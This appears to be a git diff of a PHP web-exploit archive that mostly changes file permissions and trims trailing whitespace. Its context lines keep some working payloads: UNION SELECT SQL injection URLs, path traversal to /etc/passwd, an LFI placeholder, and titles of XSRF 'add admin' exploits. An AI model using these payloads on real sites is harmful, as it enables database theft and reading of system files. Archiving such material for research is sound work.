a/platforms/php/webapps/17018.txt b/platforms/php/webapps/17018.txt old mode 100755 new mode 100644 index 04fe55552..390620262 --- a/platforms/php/webapps/17018.txt +++ b/platforms/php/webapps/17018.txt @@ -28,6 +28,4 @@ POC http://site.com/blog/addComment.php?stat=stat&type=t&category_id=9&topic_id=-122/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16-- thanks, --p0pc0rn- - - \ No newline at end of file +-p0pc0rn- \ No newline at end of file diff --git a/platforms/php/webapps/17046.txt b/platforms/php/webapps/17046.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17050.txt b/platforms/php/webapps/17050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17051.txt b/platforms/php/webapps/17051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17054.txt b/platforms/php/webapps/17054.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17055.txt b/platforms/php/webapps/17055.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17056.txt b/platforms/php/webapps/17056.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17057.txt b/platforms/php/webapps/17057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1706.txt b/platforms/php/webapps/1706.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17061.txt b/platforms/php/webapps/17061.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17062.txt b/platforms/php/webapps/17062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17069.txt b/platforms/php/webapps/17069.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17076.txt b/platforms/php/webapps/17076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17077.txt b/platforms/php/webapps/17077.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17079.txt b/platforms/php/webapps/17079.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17080.txt b/platforms/php/webapps/17080.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17084.txt b/platforms/php/webapps/17084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17085.txt b/platforms/php/webapps/17085.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17091.html b/platforms/php/webapps/17091.html old mode 100755 new mode 100644 index 51b6a27a7..fe9e533fd --- a/platforms/php/webapps/17091.html +++ b/platforms/php/webapps/17091.html @@ -20,9 +20,4 @@ E-Store 1.0 XSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/17092.html b/platforms/php/webapps/17092.html old mode 100755 new mode 100644 index 2c7b723d9..d57869ec9 --- a/platforms/php/webapps/17092.html +++ b/platforms/php/webapps/17092.html @@ -20,9 +20,4 @@ News 1.0 XSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/17093.html b/platforms/php/webapps/17093.html old mode 100755 new mode 100644 index 3ed7a361d..547130f70 --- a/platforms/php/webapps/17093.html +++ b/platforms/php/webapps/17093.html @@ -20,9 +20,4 @@ Movies Library 2.0 XSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/17094.html b/platforms/php/webapps/17094.html old mode 100755 new mode 100644 index b93720146..722e2d245 --- a/platforms/php/webapps/17094.html +++ b/platforms/php/webapps/17094.html @@ -20,9 +20,4 @@ Web Links 1.0 XSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/17095.html b/platforms/php/webapps/17095.html old mode 100755 new mode 100644 index 4fb952b49..39d1d5c0b --- a/platforms/php/webapps/17095.html +++ b/platforms/php/webapps/17095.html @@ -20,9 +20,4 @@ Audio & Video Library 2.7.0 XSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/17096.html b/platforms/php/webapps/17096.html old mode 100755 new mode 100644 index c8fa3e026..2cbf07e6c --- a/platforms/php/webapps/17096.html +++ b/platforms/php/webapps/17096.html @@ -20,9 +20,4 @@ Super Multimedia Library 2.5.0 XSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/17098.txt b/platforms/php/webapps/17098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17099.txt b/platforms/php/webapps/17099.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1710.txt b/platforms/php/webapps/1710.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17100.txt b/platforms/php/webapps/17100.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17101.txt b/platforms/php/webapps/17101.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17102.txt b/platforms/php/webapps/17102.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17103.txt b/platforms/php/webapps/17103.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17106.txt b/platforms/php/webapps/17106.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17107.txt b/platforms/php/webapps/17107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17108.txt b/platforms/php/webapps/17108.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1711.txt b/platforms/php/webapps/1711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17110.txt b/platforms/php/webapps/17110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17118.txt b/platforms/php/webapps/17118.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17119.txt b/platforms/php/webapps/17119.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17123.txt b/platforms/php/webapps/17123.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17125.txt b/platforms/php/webapps/17125.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17126.html b/platforms/php/webapps/17126.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17127.txt b/platforms/php/webapps/17127.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17128.txt b/platforms/php/webapps/17128.txt old mode 100755 new mode 100644 index b1e62fac1..f54c0fe60 --- a/platforms/php/webapps/17128.txt +++ b/platforms/php/webapps/17128.txt @@ -22,4 +22,4 @@ => http://localhost/greenpants/admin/index.php?do=editcat&i=-99 UNION SELECT NULL,VERSION(),NULL [05] ./admin/pages/editemot.php:10: $res = consultarsql("SELECT * FROM gp_emoticonos WHERE id=$id;"); - => http://localhost/greenpants/admin/index.php?do=editemot&i=-99 UNION SELECT NULL,VERSION(),NULL,NULL \ No newline at end of file + => http://localhost/greenpants/admin/index.php?do=editemot&i=-99 UNION SELECT NULL,VERSION(),NULL,NULL \ No newline at end of file diff --git a/platforms/php/webapps/17129.txt b/platforms/php/webapps/17129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17134.txt b/platforms/php/webapps/17134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17135.txt b/platforms/php/webapps/17135.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17136.txt b/platforms/php/webapps/17136.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17137.txt b/platforms/php/webapps/17137.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17141.txt b/platforms/php/webapps/17141.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17146.txt b/platforms/php/webapps/17146.txt old mode 100755 new mode 100644 index fec89efe6..4a0e87ac7 --- a/platforms/php/webapps/17146.txt +++ b/platforms/php/webapps/17146.txt @@ -52,5 +52,4 @@ Already Tested on Win Xp # [~](>D!R 4ll 0R D!E<) #; # -[~]--------------------------------------------------------------------------------------------- - \ No newline at end of file +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/17170.txt b/platforms/php/webapps/17170.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17172.txt b/platforms/php/webapps/17172.txt old mode 100755 new mode 100644 index a7a943689..210d307e3 --- a/platforms/php/webapps/17172.txt +++ b/platforms/php/webapps/17172.txt @@ -57,4 +57,4 @@ The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-11-004.pdf Other Sense of Security advisories can be found at: -http://www.senseofsecurity.com.au/research/it-security-advisories.php \ No newline at end of file +http://www.senseofsecurity.com.au/research/it-security-advisories.php \ No newline at end of file diff --git a/platforms/php/webapps/17173.txt b/platforms/php/webapps/17173.txt old mode 100755 new mode 100644 index 833d65837..e54994d45 --- a/platforms/php/webapps/17173.txt +++ b/platforms/php/webapps/17173.txt @@ -38,5 +38,4 @@ # 1337 Member: r0073r,Side^effects,r4dc0re,eidelweiss,SeeMe,agix,gunslinger # Sn!pEr.S!te,indoushka,Knockout,ZoRlu,AnT!-Tr0J4n,eXeSoul, =========================================================================== -# DisCovered By XroGuE !!! - \ No newline at end of file +# DisCovered By XroGuE !!! \ No newline at end of file diff --git a/platforms/php/webapps/17178.txt b/platforms/php/webapps/17178.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17179.txt b/platforms/php/webapps/17179.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17180.txt b/platforms/php/webapps/17180.txt old mode 100755 new mode 100644 index b999285f4..be303893a --- a/platforms/php/webapps/17180.txt +++ b/platforms/php/webapps/17180.txt @@ -18,7 +18,4 @@ # Zend -=- Virangar-=-Milad-Bushehr -=- Iman_TakTaz -=- M3QD4D -=- Hijacker # # -=- elvator -=- r3d.z0nE -=- Behrooz_Ice -=- Ali_Eagle -=- Satanic2000 -=- Rz04 # # # -###################################### TNX All ###################################### - - - \ No newline at end of file +###################################### TNX All ###################################### \ No newline at end of file diff --git a/platforms/php/webapps/17183.txt b/platforms/php/webapps/17183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17190.txt b/platforms/php/webapps/17190.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17191.txt b/platforms/php/webapps/17191.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17192.html b/platforms/php/webapps/17192.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17193.html b/platforms/php/webapps/17193.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17197.txt b/platforms/php/webapps/17197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17198.txt b/platforms/php/webapps/17198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17200.txt b/platforms/php/webapps/17200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17202.txt b/platforms/php/webapps/17202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17203.txt b/platforms/php/webapps/17203.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17204.txt b/platforms/php/webapps/17204.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17205.txt b/platforms/php/webapps/17205.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17206.txt b/platforms/php/webapps/17206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17207.txt b/platforms/php/webapps/17207.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17209.txt b/platforms/php/webapps/17209.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17211.txt b/platforms/php/webapps/17211.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17212.txt b/platforms/php/webapps/17212.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17213.txt b/platforms/php/webapps/17213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17214.php b/platforms/php/webapps/17214.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17216.txt b/platforms/php/webapps/17216.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17218.txt b/platforms/php/webapps/17218.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1722.txt b/platforms/php/webapps/1722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17220.txt b/platforms/php/webapps/17220.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17221.txt b/platforms/php/webapps/17221.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17226.txt b/platforms/php/webapps/17226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1723.txt b/platforms/php/webapps/1723.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17231.txt b/platforms/php/webapps/17231.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17235.html b/platforms/php/webapps/17235.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17236.txt b/platforms/php/webapps/17236.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17237.txt b/platforms/php/webapps/17237.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17238.html b/platforms/php/webapps/17238.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17239.txt b/platforms/php/webapps/17239.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17248.txt b/platforms/php/webapps/17248.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17250.txt b/platforms/php/webapps/17250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17251.html b/platforms/php/webapps/17251.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17264.txt b/platforms/php/webapps/17264.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17265.txt b/platforms/php/webapps/17265.txt old mode 100755 new mode 100644 index db6f59e00..ae85e2946 --- a/platforms/php/webapps/17265.txt +++ b/platforms/php/webapps/17265.txt @@ -14,4 +14,4 @@ All YOGYACARDERLINK CREW...!!! I Love You... :-) [x] Bugs Found By: g3mbeLz_YCL. -We \ No newline at end of file +We \ No newline at end of file diff --git a/platforms/php/webapps/17267.txt b/platforms/php/webapps/17267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1727.txt b/platforms/php/webapps/1727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1728.txt b/platforms/php/webapps/1728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17284.txt b/platforms/php/webapps/17284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17285.php b/platforms/php/webapps/17285.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17288.txt b/platforms/php/webapps/17288.txt old mode 100755 new mode 100644 index 0b3e8354e..e498ec440 --- a/platforms/php/webapps/17288.txt +++ b/platforms/php/webapps/17288.txt @@ -16,4 +16,4 @@ ################################################## # | Greetz : # | Dr.KAsBeR & DaShEr & MaFiA & WeeD -################################################## \ No newline at end of file +################################################## \ No newline at end of file diff --git a/platforms/php/webapps/17289.txt b/platforms/php/webapps/17289.txt old mode 100755 new mode 100644 index aaf08cd11..f3a292b15 --- a/platforms/php/webapps/17289.txt +++ b/platforms/php/webapps/17289.txt @@ -14,4 +14,4 @@ Note: -sessid had to be fresh >>published by -SmoG- on SceneGround.info<< -gretz to my mentor Therion, c0x and other sg-members! \ No newline at end of file +gretz to my mentor Therion, c0x and other sg-members! \ No newline at end of file diff --git a/platforms/php/webapps/1729.txt b/platforms/php/webapps/1729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17292.txt b/platforms/php/webapps/17292.txt old mode 100755 new mode 100644 index 04e0cf420..360159423 --- a/platforms/php/webapps/17292.txt +++ b/platforms/php/webapps/17292.txt @@ -21,5 +21,4 @@ http://site.com/view/lang/index.php?page=../../../../../../../../../../../../../ http://site.com/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd -http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd - \ No newline at end of file +http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/17293.txt b/platforms/php/webapps/17293.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17295.txt b/platforms/php/webapps/17295.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17296.txt b/platforms/php/webapps/17296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17297.txt b/platforms/php/webapps/17297.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17299.txt b/platforms/php/webapps/17299.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1730.txt b/platforms/php/webapps/1730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17301.txt b/platforms/php/webapps/17301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17303.txt b/platforms/php/webapps/17303.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17307.txt b/platforms/php/webapps/17307.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17308.txt b/platforms/php/webapps/17308.txt old mode 100755 new mode 100644 index 0b060a610..50173fa16 --- a/platforms/php/webapps/17308.txt +++ b/platforms/php/webapps/17308.txt @@ -109,4 +109,4 @@ [ EOF ] Please feel free to write me a bit if you want some information or - a professional consultancy. \ No newline at end of file + a professional consultancy. \ No newline at end of file diff --git a/platforms/php/webapps/17309.txt b/platforms/php/webapps/17309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1731.txt b/platforms/php/webapps/1731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17311.txt b/platforms/php/webapps/17311.txt old mode 100755 new mode 100644 index 321e689f7..04ee1dfd7 --- a/platforms/php/webapps/17311.txt +++ b/platforms/php/webapps/17311.txt @@ -26,4 +26,4 @@ http://localhost/myschool/show_page.php?Page_ID=[sql] http://localhost/myschool/show_page.php?Page_ID=&table=users' # Link Control Panel : http://localhost/myschool/login.php -################################################## \ No newline at end of file +################################################## \ No newline at end of file diff --git a/platforms/php/webapps/17312.txt b/platforms/php/webapps/17312.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17314.txt b/platforms/php/webapps/17314.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17316.txt b/platforms/php/webapps/17316.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17319.txt b/platforms/php/webapps/17319.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17320.txt b/platforms/php/webapps/17320.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17321.txt b/platforms/php/webapps/17321.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17322.txt b/platforms/php/webapps/17322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17327.txt b/platforms/php/webapps/17327.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17330.html b/platforms/php/webapps/17330.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17335.txt b/platforms/php/webapps/17335.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17336.txt b/platforms/php/webapps/17336.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17338.txt b/platforms/php/webapps/17338.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17341.txt b/platforms/php/webapps/17341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17343.txt b/platforms/php/webapps/17343.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17344.txt b/platforms/php/webapps/17344.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17346.php b/platforms/php/webapps/17346.php old mode 100755 new mode 100644 index 7a93d3b53..058f348d1 --- a/platforms/php/webapps/17346.php +++ b/platforms/php/webapps/17346.php @@ -148,5 +148,4 @@ else echo "+---------------------------------------------------------------+\r\n"; echo "\n\n"; } -?> - \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/17347.php b/platforms/php/webapps/17347.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17350.txt b/platforms/php/webapps/17350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17367.html b/platforms/php/webapps/17367.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17379.txt b/platforms/php/webapps/17379.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1738.php b/platforms/php/webapps/1738.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17380.txt b/platforms/php/webapps/17380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17390.txt b/platforms/php/webapps/17390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17394.txt b/platforms/php/webapps/17394.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17395.txt b/platforms/php/webapps/17395.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17402.txt b/platforms/php/webapps/17402.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17403.txt b/platforms/php/webapps/17403.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17406.txt b/platforms/php/webapps/17406.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17408.txt b/platforms/php/webapps/17408.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17410.txt b/platforms/php/webapps/17410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17411.txt b/platforms/php/webapps/17411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17412.txt b/platforms/php/webapps/17412.txt old mode 100755 new mode 100644 index 6020822d4..0cabdf605 --- a/platforms/php/webapps/17412.txt +++ b/platforms/php/webapps/17412.txt @@ -17,4 +17,4 @@ http://localhost/[PATH]/print.php?task=person&id=36 [SQL] ******************************************************************************** Ordu-yu Lojistik TIM // CoBRa_21 -******************************************************************************** \ No newline at end of file +******************************************************************************** \ No newline at end of file diff --git a/platforms/php/webapps/17413.txt b/platforms/php/webapps/17413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17414.txt b/platforms/php/webapps/17414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17423.txt b/platforms/php/webapps/17423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17426.txt b/platforms/php/webapps/17426.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17428.txt b/platforms/php/webapps/17428.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17431.txt b/platforms/php/webapps/17431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17435.txt b/platforms/php/webapps/17435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17436.txt b/platforms/php/webapps/17436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17444.txt b/platforms/php/webapps/17444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17445.txt b/platforms/php/webapps/17445.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17446.txt b/platforms/php/webapps/17446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17452.txt b/platforms/php/webapps/17452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17453.txt b/platforms/php/webapps/17453.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17457.txt b/platforms/php/webapps/17457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17464.txt b/platforms/php/webapps/17464.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17465.txt b/platforms/php/webapps/17465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17466.txt b/platforms/php/webapps/17466.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17477.txt b/platforms/php/webapps/17477.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17483.txt b/platforms/php/webapps/17483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17484.txt b/platforms/php/webapps/17484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17485.txt b/platforms/php/webapps/17485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17487.php b/platforms/php/webapps/17487.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17495.txt b/platforms/php/webapps/17495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17496.txt b/platforms/php/webapps/17496.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17500.txt b/platforms/php/webapps/17500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17508.txt b/platforms/php/webapps/17508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1751.php b/platforms/php/webapps/1751.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17514.php b/platforms/php/webapps/17514.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17515.txt b/platforms/php/webapps/17515.txt old mode 100755 new mode 100644 index 7452928d5..f672497de --- a/platforms/php/webapps/17515.txt +++ b/platforms/php/webapps/17515.txt @@ -14,4 +14,4 @@ ~ ( Greetz ) ~ <=[ sA^Dev!L , i-Hmx , Fox , Lagripe-dz , And Welcome back sec4ever.com ... ]=> --==================== in The Name Of aLLah ====================- \ No newline at end of file +-==================== in The Name Of aLLah ====================- \ No newline at end of file diff --git a/platforms/php/webapps/17518.txt b/platforms/php/webapps/17518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17522.txt b/platforms/php/webapps/17522.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17523.txt b/platforms/php/webapps/17523.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17524.html b/platforms/php/webapps/17524.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17525.txt b/platforms/php/webapps/17525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17528.txt b/platforms/php/webapps/17528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17529.txt b/platforms/php/webapps/17529.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1753.txt b/platforms/php/webapps/1753.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17530.txt b/platforms/php/webapps/17530.txt old mode 100755 new mode 100644 index 4800cd0c6..2e7808f70 --- a/platforms/php/webapps/17530.txt +++ b/platforms/php/webapps/17530.txt @@ -12,4 +12,4 @@ POSTDATA: option=com_sobi2&tmpl=component&tag=[Encoded SQL] POSTDATA: option=com_sobi2&tmpl=component&letter=[Encoded SQL] -Updated release: http://www.sigsiu.net/latest_news/sobi2_version_2.9.4_released.html \ No newline at end of file +Updated release: http://www.sigsiu.net/latest_news/sobi2_version_2.9.4_released.html \ No newline at end of file diff --git a/platforms/php/webapps/17531.txt b/platforms/php/webapps/17531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17532.txt b/platforms/php/webapps/17532.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17533.txt b/platforms/php/webapps/17533.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17553.txt b/platforms/php/webapps/17553.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17554.txt b/platforms/php/webapps/17554.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17555.txt b/platforms/php/webapps/17555.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17556.txt b/platforms/php/webapps/17556.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17560.txt b/platforms/php/webapps/17560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17562.php b/platforms/php/webapps/17562.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17570.txt b/platforms/php/webapps/17570.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17571.txt b/platforms/php/webapps/17571.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17573.txt b/platforms/php/webapps/17573.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17584.php b/platforms/php/webapps/17584.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17587.txt b/platforms/php/webapps/17587.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17590.txt b/platforms/php/webapps/17590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17591.txt b/platforms/php/webapps/17591.txt old mode 100755 new mode 100644 index e0021631e..4d3d21d13 --- a/platforms/php/webapps/17591.txt +++ b/platforms/php/webapps/17591.txt @@ -27,4 +27,4 @@ http://127.0.0.1/[path]/index.php?option=com_obsuggest&controller=[LFI]%00 Credits: ------- -www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id \ No newline at end of file +www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id \ No newline at end of file diff --git a/platforms/php/webapps/17592.txt b/platforms/php/webapps/17592.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17593.txt b/platforms/php/webapps/17593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17595.txt b/platforms/php/webapps/17595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17597.txt b/platforms/php/webapps/17597.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1760.php b/platforms/php/webapps/1760.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17602.txt b/platforms/php/webapps/17602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17603.txt b/platforms/php/webapps/17603.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17613.php b/platforms/php/webapps/17613.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17616.txt b/platforms/php/webapps/17616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17617.txt b/platforms/php/webapps/17617.txt old mode 100755 new mode 